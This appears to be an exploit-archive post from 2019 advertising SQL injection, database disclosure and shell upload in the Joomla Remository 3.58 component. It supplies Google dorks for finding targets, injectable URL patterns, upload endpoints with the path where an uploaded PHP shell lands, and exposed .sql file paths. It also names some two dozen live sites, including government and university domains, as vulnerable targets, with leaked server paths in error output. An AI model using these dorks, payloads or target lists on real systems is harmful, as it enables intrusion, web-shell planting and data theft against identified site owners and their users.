facebook facebook twitter rss

Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************

“Remository” is open source software for Joomla.

####################################################################

# Impact :
***********

*Attackers can exploit this issue via a browser.

The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers

upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the

context of the webserver process. This may facilitate unauthorized access or

privilege escalation; other attacks are also possible.

* An attacker might be able inject and/or alter existing

SQL statements which would influence the database exchange.

* SQL injection vulnerability in the Joomla Remository Components 3.58 because,

it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database.

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_remository&Itemid=[SQL Injection]

/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]

####################################################################

# Arbitrary File Upload Exploit :
****************************
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles

/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]

/index.php/shared-file-repository/func-addmanyfiles/

Directory File Path :
******************

Search your file here.

/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php

/components/com_remository_files/......

Note : If websites are not vulnerable it says ;

You have no permitted upload categories - please refer to the webmaster

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_remository/assignment.sql

/administrator/components/com_remository/blob.sql

/administrator/components/com_remository/containers.sql

/administrator/components/com_remository/file.sql

/administrator/components/com_remository/log.sql

/administrator/components/com_remository/permission.sql

/administrator/components/com_remository/repository.sql

/administrator/components/com_remository/reviews.sql

/administrator/components/com_remository/structure.sql

/administrator/components/com_remository/text.sql

####################################################################

# Example Vulnerable Sites :
*************************

[+] temporalesunoa.com/dgtree/joomla/administrator/components/com_remository/repository.sql

[+] oceap.gov.ng/administrator/components/com_remository/remository.sql

[+] nacat.org/index.php?option=com_remository&Itemid=173&func=addfile&parent=category

[+] jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=173&func=addfile&parent=category

[+] telecip.com.co/telecip/index.php?option=com_remository&Itemid=173&func=addfile&parent=category

[+] ics-casalserugo.gov.it/joomla/index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27

[+] cccv.gob.ec/web/index.php?option=com_remository&Itemid=67&func=select&id=8%27

[+] elsemillero.net/nuevo/index.php?option=com_remository&Itemid=165%27

[+] pymeschamartin.softdream.es/index.php?option=com_remository
&Itemid=7&func=select&id=5&orderby=5&page=3%27

[+] ohaysoft.com/index.php?option=com_remository&Itemid=116&func=
download&id=149&chk=4e4f957a2083a4f41e98e5d163e7bc37&no_html=1%27

[+] fullthrottlesimracing.net/main/index.php?option=com_remository&Itemid=60&func=select&id=3%27

[+] old.tpp.pulawy.pl/index.php?option=com_remository&Itemid=49&func=fileinfo&id=36%27

[+] b2biaxis.com/index.php?option=com_remository&Itemid=416&func=fileinfo&id=2%27

[+] concretedev.com/index.php?option=com_remository&Itemid=37%27

[+] lexcont.de/index.php?option=com_remository&Itemid=4%27

[+] cnawg.net/index.php?option=com_remository&Itemid=28&func=addfile

[+] parachutemanuals.com/index.php?option=com_remository&Itemid=41&func=addfile&id=52

[+] newyork.ing.uniroma1.it/IC0902/index.php?option=com_remository&Itemid=82&func=addfile

[+] kline.ca/index.php?option=com_remository&Itemid=38&func=addfile&id=1

[+] vldb.org/vldb_journal/index.php?option=com_remository&Itemid=60&func=addfile&id=13625

[+] seytpe.gr/25/index.php?option=com_remository&Itemid=100088&func=addmanyfiles

[+] blackburnwithdarwenlink.org.uk/index.php?option=com_remository&Itemid=11&func=addfile&id=25

[+] station-drivers.com/index.php?option=com_remository&Itemid=353&func=addfile&id=373&lang=en

[+] bssb.de/index.php?func=addfile&id=1215&Itemid=647&option=com_remository&datum=01-01-2018

####################################################################

# SQL Database Error :
*********************

Strict Standards: Non-static method JLoader::import() should not be called
statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29

Deprecated: Assigning the return value of new by reference is deprecated in
/home/epangsof/public_html/includes/joomla.php on line 836

Warning: Cannot modify header information - headers already sent by
(output started at /home/epangsof/public_html/includes/joomla.php:836) in
/home/epangsof/public_html/includes/joomla.php on line 697

Fatal error: Uncaught Error: Call to undefined function
set_magic_quotes_runtime() in /home4/hbman23/public_html/main
/includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html
/main/index.php(22): require_once() #1 {main} thrown in
/home4/hbman23/public_html/main/includes/framework.php on line 21

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :